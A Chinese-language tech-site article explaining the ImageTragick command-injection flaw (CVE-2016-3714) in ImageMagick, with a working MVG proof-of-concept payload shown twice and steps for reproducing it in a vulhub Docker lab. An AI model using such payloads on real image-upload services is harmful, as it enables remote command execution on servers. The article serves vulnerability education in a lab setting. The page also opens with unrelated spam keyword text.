国产精品久久久aaaa,日日干夜夜操天天插,亚洲乱熟女香蕉一区二区三区少妇,99精品国产高清一区二区三区,国产成人精品一区二区色戒,久久久国产精品成人免费,亚洲精品毛片久久久久,99久久婷婷国产综合精品电影,国产一区二区三区任你鲁

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

一款使用量很廣的圖片處理程序ImageMagick

Android編程精選 ? 來源:小白學黑客 ? 作者:小白哥 ? 2022-08-16 10:18 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

大家好,我是小白哥。

這兩天,關于QQ盜號的安全事件相信大家已經聽說了。各種各樣的傳言都有,一會兒數據庫泄露了,一會兒API漏洞了,一會兒又是協議漏洞了,還有的說掃描二維碼中招的,一時間眾說紛紜。

在眾多說法中,我看到了一個:只要點擊圖片就會中招!

好家伙,點圖片就能中招,這可厲害了,要是對方發來一些誘惑的圖片,年輕人把持不住那可咋整?

真有那么懸乎嗎?

這不禁讓我想起了幾年前的一個漏洞,也是圖片相關的,分享給大家看看。

那次漏洞的主角,是ImageMagick。

漏洞介紹

漏洞名稱:Imagemagick 命令注入漏洞(CVE-2016-3714)

漏洞定級:高危

漏洞描述:ImageMagick 在處理惡意構造的圖片文件時,對于文件中的 URL 未經嚴格過濾,可導致命令注入漏洞。通過命令注入漏洞,黑客可以在服務器上執行任意系統命令,獲取服務器權限。

影響范圍:ImageMagick 6.9.3-9本身及以前所有版本

漏洞原理

ImageMagick是一款使用量很廣的圖片處理程序,很多廠商都調用了這個程序進行圖片處理,包括圖片的伸縮、切割、水印、格式轉換等等。

但有研究者發現,當用戶傳入一個包含『畸形內容』的圖片的時候,就有可能觸發命令注入漏洞。

國外的安全人員為此新建了一個網站:https://imagetragick.com/

與這個漏洞相關的CVE有CVE-2016-3714、CVE-2016-3715CVE-2016-3716、CVE-2016-3717,

其中最嚴重的就是CVE-2016-3714,利用這個漏洞可以造成遠程命令執行的危害。

ImageMagick有一個功能叫做delegate(委托),作用是調用外部的lib來處理文件。而調用外部lib的過程是使用系統的system命令來執行的

參考代碼:https://github.com/ImageMagick/ImageMagick/blob/e93e339c0a44cec16c08d78241f7aa3754485004/MagickCore/delegate.c#L347

我們在ImageMagick的默認配置文件里可以看到所有的委托:/etc/ImageMagick/delegates.xml漏洞報告中給出的POC是利用了如下的這個委托:

"https"command=""curl"-s-k-o"%o""https:%M""/>

它在解析https圖片的時候,使用了curl命令將其下載,我們看到%M被直接放在curl的最后一個參數內。

ImageMagick默認支持一種圖片格式,叫mvg,而mvg與svg格式類似,其中是以文本形式寫入矢量圖的內容,而這其中就可以包含https處理過程。

所以我們可以構造一個.mvg格式的圖片(但文件名可以不為.mvg,比如下圖中包含payload的文件的文件名為vul.gif,而ImageMagick會根據其內容識別為mvg圖片),并在https://后面閉合雙引號,寫入自己要執行的命令:

pushgraphic-context
viewbox00640480
fill‘url(https://"|id;")’
popgraphic-context

這樣,ImageMagick在正常執行圖片轉換、處理的時候就會觸發漏洞。

漏洞復現

  • 搭建靶機,教程:https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
  • 下載vulhub:git clone https://github.com/vulhub/vulhub/tree/master/imagemagick/imagetragick
  • 進入目錄:cd /vulhub-master/imagemagick/imagetragick
  • 啟動docker:docker-compose up -d 注意 我靶機 docker-compose.yml中端口為8888
6c4e0e0c-1cf7-11ed-ba43-dac502259ad0.png
  • 訪問搭建的靶機ip:8888
6c62c91e-1cf7-11ed-ba43-dac502259ad0.png
  • 上傳poc,新建一個txt文件,內容為:
pushgraphic-context
viewbox00640480
fill'url(https://"|id;")'
popgraphic-context

將文件保存為poc.gif

6c79b7a0-1cf7-11ed-ba43-dac502259ad0.png

上次poc.gif,點擊提交,成功執行:

6c91dbf0-1cf7-11ed-ba43-dac502259ad0.png

這年頭,除了鏈接,圖片也不敢隨便亂點了···

————————————————

漏洞原理和復現部分原文鏈接:https://blog.csdn.net/u011975363/article/details/118031227

審核編輯 :李倩


聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 數據庫
    +關注

    關注

    7

    文章

    4019

    瀏覽量

    68339
  • 漏洞
    +關注

    關注

    0

    文章

    205

    瀏覽量

    15955
  • 圖片處理
    +關注

    關注

    0

    文章

    17

    瀏覽量

    7335

原文標題:看圖片也能中招!

文章出處:【微信號:AndroidPush,微信公眾號:Android編程精選】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評論

    相關推薦
    熱點推薦

    深入解析ADI LTM4681:一款強大的數字電源模塊

    的產品,它為多軌處理器電源等應用提供了出色的解決方案。本文將對LTM4681進行全面的剖析,探討其特性、工作原理、應用場景以及設計要點。 文件下載: LTM4681.pdf 、LTM4681概述 LTM4681是一款高度可配置
    的頭像 發表于 03-04 11:50 ?190次閱讀

    STLED316S:一款強大的LED控制器與驅動器

    深入了解下。 文件下載: stled316s.pdf 、產品概述 STLED316S是一款通過3線串行接口將微處理器與LED顯示屏連接起來的緊湊型LED控制器和驅動器。它支持驅動共
    的頭像 發表于 01-28 09:45 ?293次閱讀

    淘寶圖片搜索API接口指南

    、前言 淘寶圖片搜索?API(核心為「拍立淘」相關接口)是淘寶開放平臺(TOP)提供的視覺檢索接口,核心能力是基于上傳的圖片?/?圖片?URL,檢索淘寶?/?天貓平臺的同
    的頭像 發表于 01-12 14:17 ?425次閱讀

    請問CW32系列MCU的調試工具是哪一款?

    CW32系列MCU的調試工具是哪一款?
    發表于 01-07 07:11

    釘釘正式開源HarmonyOS圖片編輯組件

    近日,由釘釘團隊自主研發的“HarmonyOS圖片編輯組件”正式上線OpenHarmony三方庫中心倉并開源。作為一款填補鴻蒙社區圖像處理領域空白的重量級組件,該方案基于HarmonyOS
    的頭像 發表于 01-05 09:58 ?495次閱讀

    深入解析ZSSC3286:一款強大的傳感器信號調理IC

    概述 ZSSC3286作為一款雙通道傳感器信號調理IC,能夠對傳感器信號進行高精度的放大、數字化處理,并針對特定傳感器進
    的頭像 發表于 12-26 18:10 ?1178次閱讀

    LM8323:一款功能強大的移動I/O伴侶芯片解析

    LM8323:一款功能強大的移動I/O伴侶芯片解析 在電子設備的設計中,一款合適的I/O伴侶芯片能極大地提升設備的性能和功能。今天我們就來深入了解下德州儀器(TI)的LM8323,這是一款
    的頭像 發表于 12-24 17:25 ?749次閱讀

    深度剖析TS3USB3000:一款高性能的USB與MHL開關芯片

    深度剖析TS3USB3000:一款高性能的USB與MHL開關芯片 在電子設備的設計中,對于信號切換和傳輸的需求日益增長,尤其是在處理高速信號時,需要一款性能卓越的開關芯片。TI公司
    的頭像 發表于 12-23 14:25 ?350次閱讀

    CWDAPLINK與J-link下載有什么區別?哪一款比較好?

    CWDAPLINK與J-link下載有什么區別?哪一款比較好?
    發表于 12-02 06:06

    請問芯源F030性能對標ST的哪一款?

    芯源F030性能對標ST的哪一款?
    發表于 11-14 07:15

    靈動微電子最新最火熱的一款芯片推薦

    希望找一款靈動微電子最新最火熱的一款芯片,我們想做個圖形化的界面配置,供大家以后直接創建工程,用國產工具McuStudio做,McuStudio支持任何內核任何廠家的芯片,希望大家有推薦的型號可以發給我
    發表于 10-29 17:15

    HarmonyOS實戰:招搞定保存圖片到相冊

    保存圖片功能幾乎是每個應用程序必備的功能之,當用戶遇到喜歡的圖片時可以保存到手機相冊。那么在鴻蒙中保存圖片是否也需要申請用戶存儲權限以及如
    的頭像 發表于 06-24 17:04 ?1262次閱讀

    CodeBuddy 打造一款響應式圖片畫廊

    圖片畫廊頁面來作為練手項目,目標很明確:要實現不等高的 Masonry 布局,點擊圖片能彈出大圖預覽,還要能通過鍵盤切換圖片。理想狀態下,它還應該支持無限滾動加載,并提供分類篩選功能。光想想就覺得挺麻煩的,但我決定用 Code
    的頭像 發表于 05-11 13:33 ?643次閱讀
    CodeBuddy 打造<b class='flag-5'>一款</b>響應式<b class='flag-5'>圖片</b>畫廊

    一款入耳式耳機的仿真與分析

    電子發燒友網站提供《一款入耳式耳機的仿真與分析.pdf》資料免費下載
    發表于 04-22 15:39 ?5次下載

    請問瑞芯微的soc芯片,有沒有尺寸小于10mm*10mm的? 找一款小尺寸的soc用于視頻處理

    請問瑞芯微的soc芯片,有沒有尺寸小于10mm*10mm的? 找一款小尺寸的soc用于視頻處理
    發表于 03-28 11:47